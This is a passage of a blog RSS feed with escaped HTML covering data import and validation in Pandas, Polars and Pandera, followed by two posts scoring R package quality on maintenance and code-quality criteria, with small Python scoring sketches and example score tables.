&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;percent&amp;#34;&lt;/span&gt;: &lt;span style="color:#ff7b72"&gt;lambda&lt;/span&gt; x: float(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;strip(&lt;span style="color:#a5d6ff"&gt;&amp;#34;%&amp;#34;&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 123,456,789 -&amp;gt; 123456789&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;downloads&amp;#34;&lt;/span&gt;: &lt;span style="color:#ff7b72"&gt;lambda&lt;/span&gt; x: int(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace(&lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category percent downloads
## 0 3.11 23.40 282343944
## 1 3.9 18.78 226548604
## 2 3.10 18.74 226155405
## 3 3.12 15.48 186819921
## 4 NaN 8.41 101489156
&lt;/code&gt;&lt;/pre&gt;
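&lt;p&gt;The lambdas above assume that every field is filled in. A blank field (such as those in the footer rows that were skipped with &lt;code&gt;nrows&lt;/code&gt;) would likely make them fail, because an empty string cannot be converted to a number. A minimal sketch of more forgiving converters follows; the function names are made up for this example and only the standard library is used.&lt;/p&gt;

```python
def parse_percent(text):
    """Convert '12.34%' to 12.34; return None for a blank field."""
    cleaned = text.strip().rstrip("%")
    return float(cleaned) if cleaned else None


def parse_count(text):
    """Convert '123,456,789' to 123456789; return None for a blank field."""
    cleaned = text.strip().replace(",", "")
    return int(cleaned) if cleaned else None


# Hypothetical usage with the import shown above:
# pd.read_csv(..., converters={"percent": parse_percent, "downloads": parse_count})
print(parse_percent("23.40%"), parse_count("282,343,944"), parse_percent(""))
```

&lt;p&gt;Named functions like these are also easier to unit-test than inline lambdas. The trade-off is that a column containing missing values may no longer be stored as a pure integer or float column.&lt;/p&gt;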
&lt;p&gt;In Polars, the &lt;code&gt;with_columns()&lt;/code&gt; method allows conversion to the expected
data-types.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; separator&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; n_rows&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;with_columns(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 12.34% -&amp;gt; 12.34&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;percent&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;str&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace(&lt;span style="color:#a5d6ff"&gt;&amp;#34;%&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;cast(pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Float64),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 123,456,789 -&amp;gt; 123456789&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;downloads&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;str&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace_all(&lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;cast(pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Int64)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## shape: (5, 3)
## ┌──────────┬─────────┬───────────┐
## │ category ┆ percent ┆ downloads │
## │ --- ┆ --- ┆ --- │
## │ str ┆ f64 ┆ i64 │
## ╞══════════╪═════════╪═══════════╡
## │ 3.11 ┆ 23.4 ┆ 282343944 │
## │ 3.9 ┆ 18.78 ┆ 226548604 │
## │ 3.10 ┆ 18.74 ┆ 226155405 │
## │ 3.12 ┆ 15.48 ┆ 186819921 │
## │ null ┆ 8.41 ┆ 101489156 │
## └──────────┴─────────┴───────────┘
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now if we validate our datasets against the Pandera schema, we should
have a little more success:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;schema&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;validate(downloads_pd)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category percent downloads
## 0 3.11 23.40 282343944
## 1 3.9 18.78 226548604
## 2 3.10 18.74 226155405
## 3 3.12 15.48 186819921
## 4 NaN 8.41 101489156
## 5 3.8 6.13 73965471
## 6 3.13 4.91 59253846
## 7 3.7 3.36 40551618
## 8 3.6 0.54 6546017
## 9 2.7 0.20 2371860
## 10 3.14 0.02 300816
## 11 3.5 0.02 231325
## 12 3.4 0.00 12777
## 13 3.15 0.00 2882
## 14 3.3 0.00 2259
## 15 2.6 0.00 87
## 16 3.2 0.00 68
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Nice.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In this post we have looked at importing data with both Pandas and
Polars. We have seen that the import functions are similar
(&lt;code&gt;read_csv(...)&lt;/code&gt;) but that there are some subtle differences with how
you specify some things (the column separator argument, the data-schema
and so on). Explicit conversion of the imported data is performed
differently between the two packages as well.&lt;/p&gt;
&lt;p&gt;Once your data has been imported, you should check that it contains what
it is supposed to: are the columns you need all present, do they store
the correct data-types, and do the values within those columns sit within
the expected range? Data-validation libraries like Pointblank and
Pandera are really useful for checking the data-schema and data-values
before you do anything critical with your dataset.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-data-import/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Package Quality: Maintainer Criteria</title><link>https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/</link><pubDate>Tue, 15 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the final part of a five-part series of related posts on validating R packages.
Other posts in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;Validation Guidelines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/" rel="external"&gt;Package Popularity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/" rel="external"&gt;Package Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/" rel="external"&gt;Code Quality&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/" rel="external"&gt;Maintenance&lt;/a&gt; (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At last we come to the final post!
Over the previous four posts, we considered all aspects of how we validate packages.
As we&amp;rsquo;ve constantly repeated, most individual scores &lt;strong&gt;aren&amp;rsquo;t that important&lt;/strong&gt;.
Instead, it&amp;rsquo;s the cumulative effect that&amp;rsquo;s important; it gives us a hint of where to spend our energy.&lt;/p&gt;
&lt;p&gt;This final post considers the package’s maintenance aspects, including update frequency and bug management.
The general idea behind this component is to understand whether bugs are addressed in a clear, quick and transparent manner.
Some of the scores are subjective, for example scoring the bug closure rate.
However, as this is combined with multiple scores, tinkering with any particular score has limited effect.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-litmus-maintainers"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="score-1-bug-closure-rate"&gt;Score 1: Bug Closure Rate&lt;/h3&gt;
&lt;p&gt;A score based on the median bug closure rate.
If longer than 12 months, give a score of 0; between 6 and 12 months, a score of 0.2; between 4 and 6 months, a score of 0.5; between 2 and 4 months,
a score of 0.8; and if shorter than two months, give 1.&lt;/p&gt;
&lt;p&gt;An analysis of CRAN suggests that 70% of packages have a bug closure rate of less than two months.&lt;/p&gt;
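&lt;p&gt;The bands above can be written as a small function. This is a Python sketch of the rule as described, not the code used by the Litmus tools; the function name is hypothetical, and the treatment of values that fall exactly on a boundary (12, 6, 4 or 2 months) is an assumption, since the description does not say which band they belong to.&lt;/p&gt;

```python
def closure_score(median_months):
    """Map a median bug closure time (in months) to a score between 0 and 1."""
    if median_months > 12:
        return 0.0
    if median_months > 6:
        return 0.2
    if median_months > 4:
        return 0.5
    if median_months >= 2:
        return 0.8
    # Shorter than two months
    return 1.0


for months in (18, 9, 5, 3, 1):
    print(months, closure_score(months))
```

&lt;p&gt;Because the score moves in steps, small changes in the median closure time usually leave the score unchanged.&lt;/p&gt;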
&lt;h3 id="score-2-maintainer"&gt;Score 2: Maintainer&lt;/h3&gt;
&lt;p&gt;Binary score of whether a package has at least one maintainer.
All packages on CRAN must have a maintainer.&lt;/p&gt;
&lt;h3 id="score-3-source-control"&gt;Score 3: Source Control&lt;/h3&gt;
&lt;p&gt;A binary score of whether the package has an associated version-controlled repository.
This isn&amp;rsquo;t just GitHub; it also includes R-Forge, GitLab, and the various other flavours of source control out there.&lt;/p&gt;
&lt;h3 id="score-4-bug-reports-url"&gt;Score 4: Bug Reports URL&lt;/h3&gt;
&lt;p&gt;A binary score of whether a package links to a location where it is possible to file bug reports.
If possible, we try to infer this URL.
For example, if the website is a GitHub repo, then it&amp;rsquo;s almost certain to have an issues page.&lt;/p&gt;
&lt;h3 id="score-5-bugs-status"&gt;Score 5: Bugs Status&lt;/h3&gt;
&lt;p&gt;The proportion of bug reports that are closed.
If no issues have ever been opened, a value of &lt;code&gt;1&lt;/code&gt; is returned.&lt;/p&gt;
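&lt;p&gt;A minimal Python sketch of this rule is shown here. The function name &lt;code&gt;bug_status_score&lt;/code&gt; is hypothetical, and the issue counts are assumed to have already been fetched from the issue tracker.&lt;/p&gt;

```python
def bug_status_score(closed: int, total: int) -> float:
    """Proportion of bug reports that are closed."""
    # A package with no issues at all is given the benefit of the doubt.
    if total == 0:
        return 1.0
    return closed / total


print(bug_status_score(3, 4))  # prints 0.75
print(bug_status_score(0, 0))  # prints 1.0
```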
&lt;h3 id="score-6-the-number-of-contributors"&gt;Score 6: The Number of Contributors&lt;/h3&gt;
&lt;p&gt;A score based on the number of contributors to the package.
Returns 0 if a single contributor, 0.5 if two contributors, 1 if 3 or more contributors are found.
Around 60% of CRAN packages have at least two contributors. Only 30% of CRAN packages have more than two contributors.&lt;/p&gt;
&lt;h3 id="score-7-maintainers-other-packages"&gt;Score 7: Maintainer&amp;rsquo;s Other Packages&lt;/h3&gt;
&lt;p&gt;Score based on how many packages its maintainers have created on CRAN.
A score of 1 indicates 3 or more CRAN packages, 0.5 two packages, and 0 for 1 or fewer packages.
Around 60% have two packages on CRAN, and 40% have three or more packages.&lt;/p&gt;
&lt;h2 id="examples"&gt;Examples&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Package&lt;/th&gt;
&lt;th&gt;No. of Contributors&lt;/th&gt;
&lt;th&gt;Bug Status&lt;/th&gt;
&lt;th&gt;Closure Rate&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{drat}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.75&lt;/td&gt;
&lt;td&gt;0.80&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{microbenchmark}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.78&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{shinyjs}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;td&gt;0.78&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{tibble}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.68&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{tsibble}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.81&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;For clarity, scores where every package scored 1 have been omitted from the table.&lt;/p&gt;
&lt;p&gt;All packages have GitHub pages and are authored by experienced R developers.
&lt;code&gt;{shinyjs}&lt;/code&gt; scores 0 for the number of contributors, as there is only a &lt;a href="https://github.com/daattali/shinyjs/blob/master/DESCRIPTION" rel="external"&gt;single contributor&lt;/a&gt;.
In the context of &lt;a href="https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/" rel="external"&gt;Shiny Application validation&lt;/a&gt;,
a sole author is something to be aware of.&lt;/p&gt;
&lt;p&gt;The (surprising?) bug closure rate is 0 for &lt;code&gt;{tibble}&lt;/code&gt;, &lt;code&gt;{shinyjs}&lt;/code&gt;, and &lt;code&gt;{microbenchmark}&lt;/code&gt;.
Looking at the &lt;a href="https://github.com/tidyverse/tibble/issues" rel="external"&gt;GitHub Issues&lt;/a&gt; for &lt;code&gt;{tibble}&lt;/code&gt;, there do seem to be a lot of long-term issues/features.
Interestingly, we&amp;rsquo;ve found that many of the popular packages have a low closure rate score.
This is usually because issues are also used to track future features.
Again, individual scores aren&amp;rsquo;t the important issues. It&amp;rsquo;s the overall story!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Package Quality: Code Quality</title><link>https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/</link><pubDate>Thu, 10 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/code-length.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part four of a five part series of related posts on validating R packages.
Other posts in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;Validation Guidelines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/" rel="external"&gt;Package Popularity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/" rel="external"&gt;Package Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/" rel="external"&gt;Code Quality&lt;/a&gt; (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/" rel="external"&gt;Maintenance&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this post, we&amp;rsquo;ll take a closer look at code quality and how we can use automated tools
to quickly get a feel for a package.
The obvious package check is &lt;code&gt;R CMD check&lt;/code&gt;.
Anyone who has created a package is familiar with constantly running &lt;code&gt;R CMD check&lt;/code&gt; to ensure that
their package is free of notes, warnings and errors.
However, that&amp;rsquo;s not the only tool we can draw on.
Codebase size, security vulnerabilities and the number of exported functions all give a hint
to the package quality.&lt;/p&gt;
&lt;p&gt;When validating R packages, code quality contributes around 50% to the total.
Remember to check out our &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;dashboard&lt;/a&gt; to get an overview.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-litmus-code-quality"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="score-1-passing-r-cmd-check"&gt;Score 1: Passing R CMD check&lt;/h3&gt;
&lt;p&gt;The bedrock of all good R packages!
Packages are downloaded, installed and the standard &lt;code&gt;R CMD check&lt;/code&gt; is performed.
The score is 1 minus the weighted sum of errors (weight 1) and warnings (weight 0.25), with a maximum score of 1 (no errors or warnings) and a minimum score of 0.
Essentially, a single error or four warnings is enough to return the lowest score of 0.&lt;/p&gt;
&lt;p&gt;We are working on being more discerning on notes and warnings, but just now, it&amp;rsquo;s a relatively simple metric that highlights packages with
potential issues.&lt;/p&gt;
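&lt;p&gt;The weighting can be sketched in a few lines of Python. This is an illustration under the reading that the weighted sum is a penalty subtracted from 1. The function name &lt;code&gt;rcmd_check_score&lt;/code&gt; is hypothetical, and the counts are assumed to come from the &lt;code&gt;R CMD check&lt;/code&gt; output.&lt;/p&gt;

```python
def rcmd_check_score(errors: int, warnings: int) -> float:
    """Score an R CMD check result: 1 is clean, 0 is the floor."""
    # Each error costs 1 and each warning 0.25 (weights from the text above).
    penalty = 1.0 * errors + 0.25 * warnings
    # Never drop below 0, however many problems are reported.
    return max(0.0, 1.0 - penalty)


print(rcmd_check_score(0, 0))  # prints 1.0
print(rcmd_check_score(0, 2))  # prints 0.5
print(rcmd_check_score(1, 0))  # prints 0.0
```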
&lt;h3 id="score-2-codebase-size"&gt;Score 2: Codebase Size&lt;/h3&gt;
&lt;p&gt;This score is based on the R codebase size, as determined by the number of lines of R code.
The general idea is that larger codebases are harder to maintain.
Of course, the obvious question is &amp;ldquo;what is a large R codebase&amp;rdquo;?&lt;/p&gt;
&lt;p&gt;Instead of coming up with arbitrary numbers, we analysed all packages on CRAN (2025/03).
If a package is in the lower quartile for codebase size, the package is scored 1.
Otherwise, the empirical CDF is used.&lt;/p&gt;
&lt;p&gt;For those who are interested, the largest R package on CRAN had 100,000+ lines of R code!&lt;/p&gt;
&lt;img src="code-length.svg" alt="Score for code length" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
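&lt;p&gt;One way to picture this kind of data-driven score is the Python sketch below. It is an assumption-laden illustration, not the litmus code: the exact way the empirical CDF is turned into a score is not spelled out above, so the sketch simply uses 1 minus the CDF outside the lower quartile. The function name &lt;code&gt;ecdf_score&lt;/code&gt; and the reference values are hypothetical.&lt;/p&gt;

```python
from bisect import bisect_right


def ecdf_score(value, reference):
    """Score 1 in the lower quartile, otherwise 1 - ECDF(value) (assumed form)."""
    ordered = sorted(reference)
    # Empirical CDF: fraction of reference values at or below `value`.
    fraction = bisect_right(ordered, value) / len(ordered)
    if fraction > 0.25:
        return 1.0 - fraction
    return 1.0


# Hypothetical line counts standing in for the CRAN-wide reference data.
reference_sizes = [100, 200, 400, 800, 1600, 3200, 6400, 12800]

print(ecdf_score(150, reference_sizes))    # prints 1.0 (lower quartile)
print(ecdf_score(1600, reference_sizes))   # prints 0.375
print(ecdf_score(12800, reference_sizes))  # prints 0.0
```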
&lt;h3 id="score-3-security-vulnerabilities"&gt;Score 3: Security Vulnerabilities&lt;/h3&gt;
&lt;p&gt;If a package has a known security vulnerability, it receives a score of 0.
This uses the &lt;code&gt;{oysteR}&lt;/code&gt; package to detect issues.&lt;/p&gt;
&lt;h3 id="score-4-release"&gt;Score 4: Release&lt;/h3&gt;
&lt;p&gt;This is a binary score: if the package under assessment is the latest version, it&amp;rsquo;s scored 1.
Otherwise, a 0 is returned.
We did investigate using a more sophisticated scoring system based on minor and major releases.
But within the R community, semantic versioning isn&amp;rsquo;t consistently followed, so we opted for a simpler rule.&lt;/p&gt;
&lt;h3 id="score-5-exported-namespace-size"&gt;Score 5: Exported Namespace Size&lt;/h3&gt;
&lt;p&gt;Score a package based on the number of exported objects.
Fewer exported objects mean the risk surface is lower, and bugs are potentially less likely. As with codebase size, the question is: what counts as large? Analysing all packages on CRAN gave us suitable cut-offs.
If a package is in the lower quartile for the number of exports, the package is scored 1.
Otherwise, the empirical CDF is used.&lt;/p&gt;
&lt;p&gt;Our analysis of CRAN suggests that most packages export relatively few objects.
A modest package exporting 11 objects scores 0.5.
Exporting around 26 objects reduces this to around 0.25.&lt;/p&gt;
&lt;h3 id="score-6-unit-test-coverage"&gt;Score 6: Unit Test Coverage&lt;/h3&gt;
&lt;p&gt;Score based on the fraction of lines of code which are covered by a unit test.
For validation of packages in the pharmaceutical sector, we also provide additional unit tests (remediated code coverage)
and investigate the test coverage of exported functions.&lt;/p&gt;
&lt;h3 id="score-7-dependencies"&gt;Score 7: Dependencies&lt;/h3&gt;
&lt;p&gt;Score based on the number of dependencies a package has, assuming a lower score for more packages.
&amp;lsquo;Suggests&amp;rsquo;, &amp;lsquo;Enhances&amp;rsquo;, base or recommended packages are not considered as dependencies when calculating this score.&lt;/p&gt;
&lt;img src="dependencies.svg" alt="Score for number of dependencies" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;This is a data driven score, based on all packages in CRAN (2025/03).
If a package is in the lower quartile for the number of package dependencies, the package is scored 1.
Otherwise, the empirical CDF is used.
In practice, this means that packages with around 5 dependencies are scored 0.5, and the score decreases to 0 at around twenty dependencies.&lt;/p&gt;
&lt;p&gt;Dependencies can be an emotive topic! As with all other scores, this metric isn&amp;rsquo;t the &amp;ldquo;be all and end all&amp;rdquo;; it&amp;rsquo;s just an
indication of package fragility.&lt;/p&gt;
&lt;h2 id="examples"&gt;Examples&lt;/h2&gt;
&lt;p&gt;For simplicity, we&amp;rsquo;ve removed the columns on vulnerabilities, R CMD check and release, as for all packages, the score was 1.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Package&lt;/th&gt;
&lt;th&gt;Dependencies&lt;/th&gt;
&lt;th&gt;Exported Namespace&lt;/th&gt;
&lt;th&gt;Test Coverage&lt;/th&gt;
&lt;th&gt;Codebase Size&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{drat}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.56&lt;/td&gt;
&lt;td&gt;0.75&lt;/td&gt;
&lt;td&gt;0.73&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{microbenchmark}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.56&lt;/td&gt;
&lt;td&gt;0.84&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{shinyjs}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0.82&lt;/td&gt;
&lt;td&gt;0.13&lt;/td&gt;
&lt;td&gt;0.03&lt;/td&gt;
&lt;td&gt;0.66&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{tibble}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0.36&lt;/td&gt;
&lt;td&gt;0.12&lt;/td&gt;
&lt;td&gt;0.82&lt;/td&gt;
&lt;td&gt;0.17&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;{tsibble}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0.20&lt;/td&gt;
&lt;td&gt;0.04&lt;/td&gt;
&lt;td&gt;0.87&lt;/td&gt;
&lt;td&gt;0.11&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The scores above indicate that &lt;code&gt;{tibble}&lt;/code&gt; and &lt;code&gt;{tsibble}&lt;/code&gt; are relatively large, complex packages.
These packages export many functions, and have multiple dependencies.
Reassuringly, they have a high test coverage.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;{shinyjs}&lt;/code&gt; package has a worryingly low test coverage.
However, inspection of the &lt;a href="https://github.com/daattali/shinyjs/tree/master/tests" rel="external"&gt;code&lt;/a&gt; shows that there are many manual tests that aren&amp;rsquo;t
captured.
This highlights a key point: automated checks aren&amp;rsquo;t enough, especially in a validated setting. Part of litmus is having a qualified person
assess the package.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/"&gt;original post&lt;/a&gt;
